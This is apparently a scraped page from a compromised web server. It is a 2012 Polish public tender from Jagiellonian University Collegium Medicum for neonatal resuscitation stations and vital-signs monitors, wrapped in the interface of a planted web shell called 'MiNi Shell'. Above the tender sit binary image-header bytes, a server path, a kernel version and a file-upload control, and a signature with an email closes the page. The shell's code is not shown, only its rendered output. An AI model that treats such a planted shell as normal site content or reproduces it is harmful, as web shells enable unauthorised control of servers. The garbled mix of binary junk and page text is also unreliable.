JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120301/49787-N-2012.html

<p class="kh_header"><b>Kraków: Dostawa aparatury medycznej, która obejmuje: Stanowisko reanimacyjne dla noworodka (5 sztuk) oraz Monitor czynności życiowych noworodka (2 sztuki),
w ramach realizacji projektu nr WND-POIS.12.02.00-00-013/08 p.n.Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie-przebudowa istniejących bloków porodowych wraz z wyposażeniem,finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.</b><br>
<b>Numer ogłoszenia: 49787 - 2012; data zamieszczenia: 01.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Jagielloński Collegium Medicum , ul. Św. Anny 12, 31-008 Kraków, woj. małopolskie, tel. 12 433 27 29, faks 12 433 27 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cm-uj.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa aparatury medycznej, która obejmuje: Stanowisko reanimacyjne dla noworodka (5 sztuk) oraz Monitor czynności życiowych noworodka (2 sztuki),
w ramach realizacji projektu nr WND-POIS.12.02.00-00-013/08 p.n.Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie-przebudowa istniejących bloków porodowych wraz z wyposażeniem,finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa aparatury medycznej, która obejmuje: Stanowisko reanimacyjne dla noworodka (5 sztuk) oraz Monitor czynności życiowych noworodka (2 sztuki), w ramach realizacji projektu nr WND-POIS.12.02.00-00-013/08 p.n. Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie - przebudowa istniejących bloków porodowych wraz z wyposażeniem, finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (Umowa nr UDA-POIS.12.02.00-00-013/08-00 z dnia 19.05.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-01 z dnia 3.12.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-02 z dnia 16.12.2011r.). Sprawa znak: DZP/CM/242/3-10/ZP/12.

Przedmiot zamówienia obejmuje II części:
Część I - dostawa stanowiska reanimacyjnego dla noworodka (5 sztuk).
Część II - dostawa monitora czynności życiowych noworodka (2 sztuki).

Parametry techniczne i warunki wymagane przedmiotu zamówienia określa Załącznik nr 2 do SIWZ.

Zamawiający dopuszcza składanie ofert częściowych: na dowolną ilość części przedmiotu zamówienia (od I do II) - wyszczególnionych w załączniku nr 2 do SIWZ.

Oferowany sprzęt musi być fabrycznie nowy, pochodzić z bieżącej produkcji 2012r. i musi posiadać dokumenty wymagane obowiązującymi przepisami tj. ustawą z dnia 20 maja 2010r. o wyrobach medycznych - (Dz. U. nr 107, poz. 679 z późn. zm.) potwierdzające oznakowanie CE (deklaracja zgodności lub certyfikat CE).

Zakres przedmiotu zamówienia obejmuje:
1.Dostawę wraz z transportem do siedziby użytkownika.
2.Montaż i uruchomienie.
3.Przeprowadzenie szkolenia dla 2 pracowników.
4.Dostarczenie instrukcji obsługi w języku polskim.
5.Udzielenie minimum 24 miesięcznej gwarancji jakości na przedmiot zamówienia, licząc od daty protokołu przekazania do eksploatacji.
6.Wykonanie w okresie gwarancji minimum 1 przeglądu gwarancyjnego w każdym roku gwarancji.
7.Autoryzowany serwis w czasie trwania okresu gwarancji.
8.Świadczenie autoryzowanego serwisu gwarancyjnego w okresie gwarancji:
a)czas reakcji serwisu - do 24 godzin od momentu wysłania faksu lub e-maila z informacją o wadzie,
b)wymagany termin naprawy - do 14 dni od chwili zgłoszenia wady. W przypadku braku możliwości dokonania naprawy w tym terminie, wykonawca zobowiązany jest do dostarczenia na własny koszt aparatu zastępczego o parametrach nie gorszych niż naprawiany (na czas naprawy).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.17.22.00-8, 33.19.51.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oferowany sprzęt musi posiadać dokumenty wymagane obowiązującymi przepisami tj. ustawą z dnia 20 maja 2010r. o wyrobach medycznych - (Dz. U. nr 107, poz. 679 z późn. zm.) potwierdzające oznakowanie CE (deklaracja zgodności lub certyfikat CE)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.cm-uj.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych UJ CM
ul. Grzegórzecka 20
31-531 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: Dział Zamówień Publicznych UJ CM
ul. Grzegórzecka 20
31-531 Kraków
pok. 245.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nr WND-POIS.12.02.00-00-013/08 p.n. Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie - przebudowa istniejących bloków
porodowych wraz z wyposażeniem, finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (Umowa nr UDA-POIS.12.02.00-00-013/08-00 z dnia 19.05.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-01 z dnia 3.12.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-02 z dnia 16.12.2011r.).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa stanowiska reanimacyjnego dla noworodka (5 sztuk).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa stanowiska reanimacyjnego dla noworodka (5 sztuk)
1.Stanowisko do resuscytacji noworodka z wyposażeniem - urządzenie fabrycznie nowe, nieużywane, nie powystawowe, pochodzące z bieżącej produkcji 2012r.
2.Inkubator otwarty posiadający stabilną konstrukcję, umieszczony na podstawie jezdnej.
Min. 2 kółka wyposażone w hamulec.
3.Moduł podnośnika elektrycznego realizujący płynną regulację położenia materacyka względem poziomu podłogi.
4.Zasilanie AC dostosowane do 230 V +/-10%, 50 Hz
5.Kolorowy wyświetlacz (ekran) na panelu sterującym, typu LCD do prezentacji parametrów nastawianych i monitorowanych.
6.Płynna regulacja kata nachylenia podstawy z materacykiem 
w zakresie: min. +/- 10°
7.Prowadnice lub szuflada do wprowadzenia kasety RTG pod materacyk bez konieczności przemieszczania dziecka.
8.Wyciszanie alarmów w sposób bezdotykowy.
9.Głośniki alarmów usytuowane w podstawie inkubatora, w celu ograniczenia poziomu hałasu oddziałującego na pacjenta
10.Alarmy akustyczne i optyczne.
11.Promiennik grzejny, z regulacją mocy grzania z poziomu panelu sterującego. Zakres regulacji mocy grzania (0÷100)%.
12.Konstrukcja promiennika koncentrująca ogrzewanie na dziecku (nie na głowach personelu). Promiennik bez możliwości odsuwania/odchylania podczas wykonywania zabiegów w obrębie noworodka, zapewniająca równomierne nagrzewanie powierzchni materacyka.
13.Moc promiennika: min. 350 W
14.Automatyczne ustawienie mocy grzania na 100%, 
po włączeniu inkubatora.
15.Czas grzania wstępnego, uzależniony od temperatury otoczenia, jednak nie mniejszy niż 7 minut. 
16.Dodatkowe źródło światła - zintegrowana lampa obserwacyjna o regulowanym natężeniu światła.
17.Zintegrowana lampa zabiegowa, umożliwiająca podświetlanie wybranego obszaru pacjenta: min. 2000 lux
18.Opuszczane, przezierne ścianki boczne inkubatora.
Ścianki boczne wykonane z materiału zapewniającego odporność na uderzenia i zgięcia.
19.Układ automatycznej regulacji temperatury bazujący na pomiarach temperatury skóry noworodka w zakresie: min. (34,5÷37,5)°C ze skokiem 0,1°C
20.Manualna regulacja temperatury.
21.Zakres pomiarowy temperatury skóry pacjenta min (32÷41) °C z dokładnością czujnika ? 0,1°C
22.Stanowisko wyposażone w stoper APGAR wyświetlający upływający czas (po min. 1, 5, 10 minutach) oraz okresowo dźwięk przypominający o ocenie punktacji APGAR noworodka. Możliwość wł./wył. tej funkcji.
23.Zestaw do resuscytacji składający się z manometru oraz przepływomierza. Precyzyjne nastawy stężenia tlenu 
w mieszance realizowane za pomocą mieszalnika. 
24.Regulacja wartości ciśnienia gazów dostarczanych pacjentowi 
z zabezpieczeniem podaży powyżej 30 cm H2O (prezentacja aktualnej wartości ciśnienia w drogach oddechowych na manometrze) oraz jej płynną regulacją. 
25.Ustawianie wartości ciśnienia końcowo-wydechowego PEEP.
26.Ssak z regulacją siły ssania oraz manometrem.
27.Wbudowane w stanowisko gniazdo do podłączenia czujnika saturacji.
28.Uchwyt od frontu i tyłu inkubatora otwartego, ułatwiający jego transport.
29.Wykonywanie automatycznie testu sprawdzającego po włączeniu do sieci oraz okresowo w trakcie pracy inkubatora, 
w celu ciągłej kontroli poprawności funkcjonowania urządzenia.
30.Min. 2 dodatkowe gniazda elektryczne wbudowane fabrycznie 
w inkubator umożliwiające podłączenie innego sprzętu.
31.System szuflad i pojemników.
32.Szyna do mocowania dodatkowych akcesoriów, stanowiąca integralną część panelu głównego.
33.Waga dla noworodka z dokładnością pomiaru +/- 5 g.
34.Czujnik wielorazowy do pomiaru temperatury - 1 szt./stanowisko.
35.Nakładki odblaskowe na czujniki temp. 20 szt./stanowisko.
36.Możliwość rozbudowy o moduł bezdotykowego pomiaru temperatury noworodka. 
37.Układy oddechowe jednorazowe do resuscytacji zawierające maski ustno-nosowe w min. 3 rozmiarach - 3 komplety na stanowisko.
38.Pojemnik na cewniki odsysające o długości 50 cm - 1 sztuka.
39.Pojemnik lub koszyk na drobne akcesoria - 1 sztuka.
40.Pojemnik na rękawiczki jednorazowe - 1 sztuka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.22.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa monitora czynności życiowych noworodka (2 sztuki).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa monitora czynności życiowych noworodka (2 sztuki)
1.Monitory czynności życiowych noworodka - fabrycznie nowe, nieużywane - pochodzące z bieżącej produkcji 2012r.
I.WYMAGANIA OGÓLNE:
2.Monitor transportowo-stacjonarny, z wbudowana rączką do przenoszenia.
3.Wbudowany rejestrator termiczny do drukowania krzywych dynamicznych oraz trendów.
4.Drukowanie na żądanie oraz automatycznie w chwili alarmu.
5.Awaryjne zasilanie monitora na czas transportu pacjenta min. 180 minut. (Warunki: Automatyczny pomiar NIBP co 5 minut, EKG, ODD, SPO2, drukowanie jednominutowego zapisu co 20 minut).
6.Niska masa monitora ułatwiająca przenoszenie: max. 6 kg
7.Monitor przystosowany do pracy w sieci centralnego monitorowania.
8.Monitor przeznaczony dla wszystkich grup wiekowych - noworodki, dzieci oraz dorośli.
9.Kolorowy ekran LCD TFT o przekątnej: min. 10 cali
10.Informacje wyświetlane na ekranie oraz cała komunikacja 
z użytkownikiem w języku polskim, łatwo dostępny system 
pomocy w języku polskim.
11.Obsługa monitora poprzez przyciski szybkiego dostępu lub/i pokrętło i/lub ekran dotykowy.
12.Do min. 4 różnych (nie tylko EKG) krzywych dynamicznych wyświetlanych na ekranie, obok każdej krzywej prezentowane są wartości cyfrowe parametrów charakterystycznych dla danego pomiaru.
13.Możliwość wyświetlenia dużych pól z wartościami cyfrowymi wraz 
z krzywą EKG.
II.MIERZONE PARAMETRY:
A)EKG
14.Monitor umożliwiający monitorowanie EKG z 3 lub 5 elektrod.
15.Częstość rytmu serca mierzona w zakresie: min. 30-300 ud./min.
16.W zestawie kabel zbiorczy EKG i zestaw odprowadzeń dla noworodków.
B)Pomiar respiracji
17.Pomiar respiracji metodą impedancyjną.
18.Wyświetlana wartość cyfrowa wraz z falą oddechu. Minimalny zakres: 6 - 120 odd./min
19.Dokładność pomiaru częstości oddechów przynajmniej: +/-2 oddechy na minutę
C)Pomiar saturacji
20.Wyświetlane wartości cyfrowe saturacji i tętna oraz krzywa pletyzmograficzna.
21.Pomiar częstości tętna w zakresie: min. 30-200 /min.
22.W komplecie przewód interfejsowy i komplet czujników neonatologicznych.
23.System monitorowania zapewniający poprawne pomiary przy słabym lub zakłóconym sygnale (Masimo lub inny).
D)Nieinwazyjny pomiar ciśnienia krwi
24.Pomiar na żądanie, automatycznie w wybranych odstępach czasowych, ciągłe pomiary przez określony czas.
25.Pomiar w zakresie: min. 15-260 mmHg:
26.Maksymalny czas pomiaru: max 120 s.
27.Pomiar częstości tętna podczas pomiaru NIBP w zakresie: 
min. 30-200 /min
28.Monitor musi wyświetlać wartość HR w przypadku braku monitorowania EKG i SPO2:
29.Czas repetycji pomiarów automatycznych: min. 1 - 120 min
30.W komplecie przewód i zestaw mankietów dla noworodków. 
E)Temperatura
31.Pomiar temperatury głębokiej.
32.W komplecie czujnik temperatury głębokiej.
F)Inne
33.Trendy tabelaryczne i numeryczne mierzonych parametrów: min. 24 h
34.Min. 3 kategorie alarmów - statusu pomiaru, granic alarmowych, alarmy systemowe.
35.Min. 4 priorytety alarmów rozróżnialnych za pomocą sygnałów dźwiękowych i świetlnych wszystkich parametrów z podaniem przyczyny alarmu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.51.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com